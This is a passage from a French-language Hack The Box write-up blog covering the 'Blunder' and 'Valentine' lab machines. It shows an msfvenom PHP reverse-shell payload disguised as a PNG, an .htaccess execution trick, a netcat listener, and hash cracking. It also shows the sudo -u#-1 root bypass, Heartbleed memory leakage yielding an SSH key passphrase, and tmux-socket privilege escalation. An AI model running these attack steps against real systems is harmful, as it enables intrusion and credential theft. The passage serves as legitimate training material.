7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 #####################################################\u0026#34; ┌──(kali㉿kali)-[~/htb/Blunder] └─$ msfvenom -p php/reverse_php LHOST=10.10.16.19 LPORT=1337 -f raw -b \u0026#39;\u0026#34;\u0026#39; \u0026gt; evil.png [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 4051 (iteration=0) php/base64 chosen with final size 4051 Payload size: 4051 bytes ┌──(kali㉿kali)-[~/htb/Blunder] └─$ echo -e \u0026#34;\u0026lt;?php $(cat evil.png)\u0026#34; \u0026gt; evil.png ####################################################### ## Après le premier test, je n\u0026#39;arrivais pas a stabiliser mon shell ## J\u0026#39;ai donc utiliser un autre code php pour ouvrir un reverse shell ┌──(kali㉿kali)-[~/htb/Blunder] └─$ cp php-reverse-shell.php evil.png ┌──(kali㉿kali)-[~/htb/Blunder] └─$ cat evil.png \u0026lt;?php eval(base64_decode(\u0026#39;IoJG91dCkpOwogICAgICB......2xvc2UoJHMpOwogICAgfQo\u0026#39;)); ┌──(kali㉿kali)-[~/htb/Blunder] └─$ echo \u0026#34;RewriteEngine off\u0026#34; \u0026gt; .htaccess ┌──(kali㉿kali)-[~/htb/Blunder] └─$ echo \u0026#34;AddType application/x-httpd-php .png\u0026#34; \u0026gt;\u0026gt; .htaccess ┌──(kali㉿kali)-[~/htb/Blunder] └─$ python3 dir_traversal.py cookie: qg5smk61bhamr0lg3t0s8n9mq5 csrf_token: 6325cd57b7d27ae4de54cefa8d79d6a7e15279d8 Uploading payload: evil.png Uploading payload: .htaccess ---------------------------------------------------------------- ┌──(kali㉿kali)-[~/htb/Blunder] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.16.19] from (UNKNOWN) [10.10.10.191] 36802 Linux blunder 5.3.0-53-generic #47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 23:40:39 up 1 day, 7:09, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT shaun :0 :0 Tue16 ?xdm? 8:54 0.00s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ whoami www-data $ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; www-data@blunder:/$ export TERM=xterm export TERM=xterm www-data@blunder:/$ ^Z zsh: suspended nc -lnvp 1337 ┌──(kali㉿kali)-[~/htb/Blunder] └─$ stty raw -echo; fg [1] + continued nc -lnvp 1337 www-data@blunder:/$ whoami www-data Getting Hugo user - user flag En fouillant un peu dans les fichiers du serveur web, on trouve rapidement le mot de passe de hugo: faca404fd5c0a31cf1897b823c695c85cffeb98d Dans crackstation on obtient: hugo : Password120\nJ\u0026rsquo;ai fait un grep de hugo car j\u0026rsquo;ai vu le nom de cet utilisant dans le dossier /home. De plus, hugo etait l\u0026rsquo;utilisateur contenant disposant du fichier user.txt.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 www-data@blunder:/$ cd var www-data@blunder:/var$ cd www www-data@blunder:/var/www$ ls bludit-3.10.0a bludit-3.9.2 html www-data@blunder:/var/www$ grep -rni hugo bludit-3.10.0a/bl-content/databases/users.php:4: \u0026#34;nickname\u0026#34;: \u0026#34;Hugo\u0026#34;, bludit-3.10.0a/bl-content/databases/users.php:5: \u0026#34;firstName\u0026#34;: \u0026#34;Hugo\u0026#34;, www-data@blunder:/var/www$ cd bludit-3.10.0a/ www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content/ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases/ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls categories.php plugins site.php tags.php pages.php security.php syslog.php users.php www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php \u0026lt;?php defined(\u0026#39;BLUDIT\u0026#39;) or die(\u0026#39;Bludit CMS.\u0026#39;); ?\u0026gt; { \u0026#34;admin\u0026#34;: { \u0026#34;nickname\u0026#34;: \u0026#34;Hugo\u0026#34;, \u0026#34;firstName\u0026#34;: \u0026#34;Hugo\u0026#34;, \u0026#34;lastName\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;role\u0026#34;: \u0026#34;User\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;faca404fd5c0a31cf1897b823c695c85cffeb98d\u0026#34;, \u0026#34;email\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;registered\u0026#34;: \u0026#34;2019-11-27 07:40:55\u0026#34;, \u0026#34;tokenRemember\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;tokenAuth\u0026#34;: \u0026#34;b380cb62057e9da47afce66b4615107d\u0026#34;, \u0026#34;tokenAuthTTL\u0026#34;: \u0026#34;2009-03-15 14:00\u0026#34;, \u0026#34;twitter\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;facebook\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;instagram\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;codepen\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;linkedin\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;github\u0026#34;: \u0026#34;\u0026#34;, \u0026#34;gitlab\u0026#34;: \u0026#34;\u0026#34;} } www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo Password: hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd hugo@blunder:~$ cat user.txt 779f.....44d0 Privilege Escalation CVE-2019-14287 : hugo -\u0026gt; root On fait un sudo -l en tant que hugo:\n1 2 3 4 5 6 7 8 exit hugo@blunder:~$ sudo -l Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash On observe qu\u0026rsquo;il peut ouvrir un shell en tant que n\u0026rsquo;importe quel utilisateur, sauf root.\nEn cherchant un peu sur le web + chatGPT s\u0026rsquo;il est possible de bypasser cette restriction, on découvre une CVE:\nCVE-2019-14287 : Sudo doesn\u0026rsquo;t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root\u0026rsquo;s id. (De même pour 4294967295 qui dépasse la limite d\u0026rsquo;un int ? Donne 0, donc l\u0026rsquo;id de root à nouveau ?)\nand /bin/bash is executed with root permission\n1 2 3 4 5 6 7 8 9 10 hugo@blunder:~$ sudo -u#-1 /bin/bash root@blunder:/home/hugo# whoami root root@blunder:/home/hugo# cat /root/root.txt 99b9.....1d73 ------------V2------------- hugo@blunder:~$ sudo -u#4294967295 /bin/bash root@blunder:/home/hugo# whoami root ","date":"2025-02-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/blunder-htb/","title":"HTB | Blunder"},{"content":" Machine name OS IP Difficulty Valentine Linux 10.10.10.79 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 $ nmap -sC -sV -An -T4 -vvv 10.10.10.79 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7P1IDtdRqun0pO9pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QDd1n16dSE2zeKKjYT9RVCXJqfYvz/ROm82p0JasEdg1z6QHTeAv70XX6cVQAjAMQoUUdF7WWKWjQuAknb4uowunpQ0yGvy72rbFkSTmlAAAAFQDwWVA5vTpfj5pUCUNFyvnhy3TdcQAAAIBFqVHk74mIT3PWKSpWcZvllKCGg5rGCCE5B3jRWEbRo8CPRkwyPdi/hSaoiQYhvCIkA2CWFuAeedsZE6zMFVFVSsHxeMe55aCQclfMH4iuUZWrg0y5QREuRbGFM6DATJJFkg+PXG/OsLsba/BP8UfcuPM+WGWKxjuaoJt6jeD8iQAAAIBg9rgf8NoRfGqzi+3ndUCo9/m+T18pn+ORbCKdFGq8Ecs4QLeaXPMRIpCol11n6va090EISDPetHcaMaMcYOsFqO841K0O90BV8DhyU4JYBjcpslT+A2X+ahj2QJVGqZJSlusNAQ9vplWxofFONa+IUSGl1UsGjY0QGsA5l5ohfQ== | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX | 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) |_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI= 80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu)) |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS 443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu)) |_ssl-date: 2025-02-09T12:49:15+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2018-02-06T00:45:25 | Not valid after: 2019-02-06T00:45:25 | MD5: a413:c4f0:b145:2154:fb54:b2de:c7a9:809d | SHA-1: 2303:80da:60e7:bde7:2ba6:76dd:5214:3c3c:6f53:01b1 | -----BEGIN CERTIFICATE----- | MIIDZzCCAk+gAwIBAgIJAIXsbfXFhLHyMA0GCSqGSIb3DQEBBQUAMEoxCzAJBgNV |_-----END CERTIFICATE----- | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html). Foothold Website (port 80) On trouve un site internet sur le port 80 avec le nom de domaine suivant : valentine.htb\ngobuster On trouve les dossiers/fichiers suivants:\n/dev /encode \u0026lt;\u0026ndash; permet d\u0026rsquo;encoder en base 64 /decode \u0026lt;\u0026ndash; decode le base64 /dev/hype.key /dev/notes.txt \u0026lt;\u0026ndash; explique qu\u0026rsquo;il y a des problemes de code dans encode/decode Le fichier hype.key est une clé privée RSA encodé en hexadecimal. Avec cyberchef on la récupère :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0d 0a 50 72 6f 63 2d 54 79 70 65 3a 20 34 2c 45 4e 43 52 59 50 54 45 44 0d 0a 44 45 4b 2d 49 6e 66 6f 3a 20 41 45 53 2d 31 32 38 2d 43 42 43 2c 41 45 42 38 38 43 31 34 30 46 36 39 42 46 32 30 37 34 37 38 38 44 45 32 34 41 45 34 38 44 34 36 0d 0a 0d 0a 44 62 50 72 4f 37 38 6b 65 67 4e 75 6b 31 44 41 71 6c 41 4e 35 6a 62 6a 58 76 30 50 50 73 6f 67 33 6a 64 62 4d 46 53 38 69 45 39 70 33 55 4f 4c 30 6c 46 30 78 66 37 50 7a 6d 72 6b 44 61 38 52 0d 0a 35 79 2f 62 34 36 2b 39 6e 45 70 43 4d 66 54 50 68 4e 75 4a 52 63 57 32 55 32 67 4a 63 4f 46 48 2b 39 52 4a 44 42 43 35 55 4a 4d 55 53 31 2f 67 6a 42 2f 37 2f 4d 79 30 30 4d 77 78 2b 61 49 36 0d 0a 30 45 49 30 53 62 4f 59 55 41 56 31 57 34 45 56 37 6d 39 36 51 73 5a 6a 72 77 4a 76 6e 6a 56 61 66 6d 36 56 73 4b 61 54 50 42 48 70 75 67 63 41 53 76 4d 71 7a 37 36 57 36 61 62 52 5a 65 58 69 0d 0a 45 62 77 36 36 68 6a 46 6d 41 75 34 41 7a 71 63 4d 2f 6b 69 67 4e 52 46 50 59 75 4e 69 58 72 58 73 31 77 2f 64 65 4c 43 71 43 4a 2b 45 61 31 54 38 7a 6c 61 73 36 66 63 6d 68 4d 38 41 2b 38 50 0d 0a 4f 58 42 4b 4e 65 36 6c 31 37 68 4b 61 54 36 77 46 6e 70 35 65 58 4f 61 55 49 48 76 48 6e 76 4f 36 53 63 48 56 57 52 72 5a 37 30 66 63 70 63 70 69 6d 4c 31 77 31 33 54 67 64 64 32 41 69 47 64 0d 0a 70 48 4c 4a 70 59 55 49 49 35 50 75 4f 36 78 2b 4c 53 38 6e 31 72 2f 47 57 4d 71 53 4f 45 69 6d 4e 52 44 31 6a 2f 35 39 2f 34 75 33 52 4f 72 54 43 4b 65 6f 39 44 73 54 52 71 73 32 6b 31 53 48 0d 0a 51 64 57 77 46 77 61 58 62 59 79 54 31 75 78 41 4d 53 6c 35 48 71 39 4f 44 35 48 4a 38 47 30 52 36 4a 49 35 52 76 43 4e 55 51 6a 77 78 30 46 49 54 6a 6a 4d 6a 6e 4c 49 70 78 6a 76 66 71 2b 45 0d 0a 70 30 67 44 30 55 63 79 6c 4b 6d 36 72 43 5a 71 61 63 77 6e 53 64 64 48 57 38 57 33 4c 78 4a 6d 43 78 64 78 57 35 6c 74 35 64 50 6a 41 6b 42 59 52 55 6e 6c 39 31 45 53 43 69 44 34 5a 2b 75 43 0d 0a 4f 6c 36 6a 4c 46 44 32 6b 61 4f 4c 66 75 79 65 65 30 66 59 43 62 37 47 54 71 4f 65 37 45 6d 4d 42 33 66 47 49 77 53 64 57 38 4f 43 38 4e 57 54 6b 77 70 6a 63 30 45 4c 62 6c 55 61 36 75 6c 4f 0d 0a 74 39 67 72 53 6f 73 52 54 43 73 5a 64 31 34 4f 50 74 73 34 62 4c 73 70 4b 78 4d 4d 4f 73 67 6e 4b 6c 6f 58 76 6e 6c 50 4f 53 77 53 70 57 79 39 57 70 36 79 38 58 58 38 2b 46 34 30 72 78 6c 35 0d 0a 58 71 68 44 55 42 68 79 6b 31 43 33 59 50 4f 69 44 75 50 4f 6e 4d 58 61 49 70 65 31 64 67 62 30 4e 64 44 31 4d 39 5a 51 53 4e 55 4c 77 31 44 48 43 47 50 50 34 4a 53 53 78 58 37 42 57 64 44 4b 0d 0a 61 41 6e 57 4a 76 46 67 6c 41 34 6f 46 42 42 56 41 38 75 41 50 4d 66 56 32 58 46 51 6e 6a 77 55 54 35 62 50 4c 43 36 35 74 46 73 74 6f 52 74 54 5a 31 75 53 72 75 61 69 32 37 6b 78 54 6e 4c 51 0d 0a 2b 77 51 38 37 6c 4d 61 64 64 73 31 47 51 4e 65 47 73 4b 53 66 38 52 2f 72 73 52 4b 65 65 4b 63 69 6c 44 65 50 43 6a 65 61 4c 71 74 71 78 6e 68 4e 6f 46 74 67 30 4d 78 74 36 72 32 67 62 31 45 0d 0a 41 6c 6f 51 36 6a 67 35 54 62 6a 35 4a 37 71 75 59 58 5a 50 79 6c 42 6c 6a 4e 70 39 47 56 70 69 6e 50 63 33 4b 70 48 74 74 76 67 62 70 74 66 69 57 45 45 73 5a 59 6e 35 79 5a 50 68 55 72 39 51 0d 0a 72 30 38 70 6b 4f 78 41 72 58 45 32 64 6a 37 65 58 2b 62 71 36 35 36 33 35 4f 4a 36 54 71 48 62 41 6c 54 51 31 52 73 39 50 75 6c 72 53 37 4b 34 53 4c 58 37 6e 59 38 39 2f 52 5a 35 6f 53 51 65 0d 0a 32 56 57 52 79 54 5a 31 46 66 6e 67 4a 53 73 76 39 2b 4d 66 76 7a 33 34 31 6c 62 7a 4f 49 57 6d 6b 37 57 66 45 63 57 63 48 63 31 36 6e 39 56 30 49 62 53 4e 41 4c 6e 6a 54 68 76 45 63 50 6b 79 0d 0a 65 31 42 73 66 53 62 73 66 39 46 67 75 55 5a 6b 67 48 41 6e 6e 66 52 4b 6b 47 56 47 31 4f 56 79 75 77 63 2f 4c 56 6a 6d 62 68 5a 7a 4b 77 4c 68 61 5a 52 4e 64 38 48 45 4d 38 36 66 4e 6f 6a 50 0d 0a 30 39 6e 56 6a 54 61 59 74 57 55 58 6b 30 53 69 31 57 30 32 77 62 75 31 4e 7a 4c 2b 31 54 67 39 49 70 4e 79 49 53 46 43 46 59 6a 53 71 69 79 47 2b 57 55 37 49 77 4b 33 59 55 35 6b 70 33 43 43 0d 0a 64 59 53 63 7a 36 33 51 32 70 51 61 66 78 66 53 62 75 76 34 43 4d 6e 4e 70 64 69 72 56 4b 45 6f 35 6e 52 52 66 4b 2f 69 61 4c 33 58 31 52 33 44 78 56 38 65 53 59 46 4b 46 4c 36 70 71 70 75 58 0d 0a 63 59 35 59 5a 4a 47 41 70 2b 4a 78 73 6e 49 51 39 43 46 79 78 49 74 39 32 66 72 58 7a 6e 73 6a 68 6c 59 61 38 73 76 62 56 4e 4e 66 6b 2f 39 66 79 58 36 6f 70 32 34 72 4c 32 44 79 45 53 70 59 0d 0a 70 6e 73 75 6b 42 43 46 42 6b 5a 48 57 4e 4e 79 65 4e 37 62 35 47 68 54 56 43 6f 64 48 68 7a 48 56 46 65 68 54 75 42 72 70 2b 56 75 50 71 61 71 44 76 4d 43 56 65 31 44 5a 43 62 34 4d 6a 41 6a 0d 0a 4d 73 6c 66 2b 39 78 4b 2b 54 58 45 4c 33 69 63 6d 49 4f 42 52 64 50 79 77 36 65 2f 4a 6c 51 6c 56 52 6c 6d 53 68 46 70 49 38 65 62 2f 38 56 73 54 79 4a 53 65 2b 62 38 35 33 7a 75 56 32 71 4c 0d 0a 73 75 4c 61 42 4d 78 59 4b 6d 33 2b 7a 45 44 49 44 76 65 4b 50 4e 61 61 57 5a 67 45 63 71 78 79 6c 43 43 2f 77 55 79 55 58 6c 4d 4a 35 30 4e 77 36 4a 4e 56 4d 4d 38 4c 65 43 69 69 33 4f 45 57 0d 0a 6c 30 6c 6e 39 4c 31 62 2f 4e 58 70 48 6a 47 61 38 57 48 48 54 6a 6f 49 69 6c 42 35 71 4e 55 79 79 77 53 65 54 42 46 32 61 77 52 6c 58 48 39 42 72 6b 5a 47 34 46 63 34 67 64 6d 57 2f 49 7a 54 0d 0a 52 55 67 5a 6b 62 4d 51 5a 4e 49 49 66 7a 6a 31 51 75 69 6c 52 56 42 6d 2f 46 37 36 59 2f 59 4d 72 6d 6e 4d 39 6b 2f 31 78 53 47 49 73 6b 77 43 55 51 2b 39 35 43 47 48 4a 45 38 4d 6b 68 44 33 0d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d ------------------------------------ -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe 2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP 09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 -----END RSA PRIVATE KEY----- Heartbleed Vulnerability On découvre une grosse vulnérabilité grâce à nmap \u0026ndash;script.\nnmap \u0026ndash;script 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 ┌──(kali㉿kali)-[~] └─$ nmap --script vuln 10.10.10.79 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 17:54 EST Nmap scan report for 10.10.10.79 Host is up (0.077s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) |_http-csrf: Couldn\u0026#39;t find any CSRF vulnerabilities. |_http-dombased-xss: Couldn\u0026#39;t find any DOM based XSS. |_http-stored-xss: Couldn\u0026#39;t find any stored XSS vulnerabilities. | http-enum: | /dev/: Potentially interesting directory w/ listing on \u0026#39;apache/2.2.22 (ubuntu)\u0026#39; |_ /index/: Potentially interesting folder 443/tcp open https |_http-csrf: Couldn\u0026#39;t find any CSRF vulnerabilities. | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://www.openssl.org/news/secadv_20140407.txt | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 |_ http://cvedetails.com/cve/2014-0160/ |_http-stored-xss: Couldn\u0026#39;t find any stored XSS vulnerabilities. | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the \u0026#34;POODLE\u0026#34; issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.securityfocus.com/bid/70574 |_ https://www.openssl.org/~bodo/ssl-poodle.pdf | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the \u0026#34;CCS Injection\u0026#34; vulnerability. | | References: | http://www.cvedetails.com/cve/2014-0224 | http://www.openssl.org/news/secadv_20140605.txt |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | http-enum: | /dev/: Potentially interesting directory w/ listing on \u0026#39;apache/2.2.22 (ubuntu)\u0026#39; |_ /index/: Potentially interesting folder |_http-dombased-xss: Couldn\u0026#39;t find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) heartbleed attack En utilisant un script python, on peut exploiter l\u0026rsquo;attaque heartbleed et trouver des infos. On récupère notamment une chaine base64 contenant le mot de passe de la clé ssh trouvé précédemment.\n1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Valentine/heartbleed-poc] └─$ python2 ./heartbleed-poc.py 10.10.10.79 | sleep 1 | cat dump.bin | grep -ia \u0026#39;==\u0026#39; -A5 -B5 42 ▒ ##0.0.1/decode.php Content-Type: application/x-www-form-urlencoded Content-Length: 42 $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== W��׼�K�o�s!J�P[ ... On décode le base64\n1 2 3 ┌──(kali㉿kali)-[~/htb/Valentine/heartbleed-poc] └─$ echo -n \u0026#34;aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==\u0026#34; | base64 -d heartbleedbelievethehype On déchiffré la clé définitivement pour ne plus avoir a taper le mot de passe:\n1 2 3 ┌──(kali㉿kali)-[~/htb/Valentine] └─$ openssl rsa -in hype.key -out hype.decrypted_key -passin pass:heartbleedbelievethehype writing RSA key SSH hype | user flag 1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(kali㉿kali)-[~/htb/Valentine] └─$ ssh -o PubkeyAcceptedKeyTypes=ssh-rsa -i hype.key hype@10.10.10.79 Enter passphrase for key \u0026#39;hype.key\u0026#39;: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64) * Documentation: https://help.ubuntu.com/ New release \u0026#39;14.04.5 LTS\u0026#39; available. Run \u0026#39;do-release-upgrade\u0026#39; to upgrade to it. Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3 hype@Valentine:~$ cat user.txt 7b7f.....1de5 Privilege escalation .bash_history On observe qu\u0026rsquo;il existe un dossier \u0026ldquo;/.devs/\u0026rdquo; contenant une session de terminal tmux \u0026ldquo;/.devs/dev_sess\u0026rdquo;.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 hype@Valentine:~$ cat .bash_history exit exot exit ls -la cd / ls -la cd .devs ls -la tmux -L dev_sess tmux a -t dev_sess tmux --help tmux -S /.devs/dev_sess exit Root tmux session - root flag 1 2 3 4 5 hype@Valentine:~$ tmux -S /.devs/dev_sess root@Valentine:/home/hype# whoami root root@Valentine:/home/hype# cat /root/root.txt ced9.....6598 Privilege escalation 2 - Dirtycow On peut aller sur ce lien pour voir une liste d\u0026rsquo;exploit dirty cow possible https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs\ndirtycow Voici celui qu\u0026rsquo;on va executer : 